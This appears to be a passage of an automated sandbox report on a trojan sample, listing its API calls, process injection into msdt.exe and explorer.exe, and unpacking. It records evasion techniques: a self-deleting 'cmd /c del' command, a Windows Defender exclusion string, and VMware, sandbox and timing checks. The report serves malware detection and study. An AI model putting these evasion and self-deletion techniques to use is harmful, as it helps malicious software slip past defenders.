          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE1D55
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F10D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B91D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277C343
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B8D6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B8D3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277C98B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02762FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02768C90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02768C8B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02762D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02762D8C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04ACB150 appears 35 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: String function: 00F1B150 appears 31 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004185EB NtCreateFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041871A NtClose,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59A10 NtQuerySection,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59560 NtWriteFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F59520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F596D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027786A0 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02778720 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277871A NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787CA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785EB NtCreateFile,
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000001.00000000.243614905.0000000000692000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000001.00000002.271111819.00000000071F0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000003.00000000.261988052.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000004.00000000.263958502.00000000003A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000005.00000000.264881846.0000000000402000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000005.00000002.363189581.000000000100F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs divpCHa0h7.exe
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: divpCHa0h7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: divpCHa0h7.exeVirustotal: Detection: 16%
          Source: divpCHa0h7.exeReversingLabs: Detection: 17%
          Source: divpCHa0h7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\divpCHa0h7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\divpCHa0h7.exe 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Users\user\Desktop\divpCHa0h7.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/1@8/5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: divpCHa0h7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: divpCHa0h7.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: divpCHa0h7.exe, msdt.exe
          Source: Binary string: msdt.pdb source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeUnpacked PE file: 5.2.divpCHa0h7.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;
          .NET source code contains potential unpackerShow sources
          Source: divpCHa0h7.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.0.divpCHa0h7.exe.690000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.2.divpCHa0h7.exe.690000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.divpCHa0h7.exe.140000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.divpCHa0h7.exe.140000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.divpCHa0h7.exe.3a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.divpCHa0h7.exe.3a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.divpCHa0h7.exe.400000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_006971C7 push 00000014h; iretd
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106203B push ebx; retf
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 3_2_001471C7 push 00000014h; iretd
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 4_2_003A71C7 push 00000014h; iretd
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B832 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B83B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B89C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277B7E5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77424395601

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.2b01658.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: divpCHa0h7.exe PID: 3240, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002768614 second address: 000000000276861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000027689AE second address: 00000000027689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exe TID: 2540Thread sleep time: -30091s >= -30000s
          Source: C:\Users\user\Desktop\divpCHa0h7.exe TID: 2840Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5240Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread delayed: delay time: 30091
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread delayed: delay time: 922337203685477
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.294005311.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.294005311.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.304751449.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.301545484.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000006.00000000.294080069.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000006.00000000.305488010.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000006.00000000.294080069.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
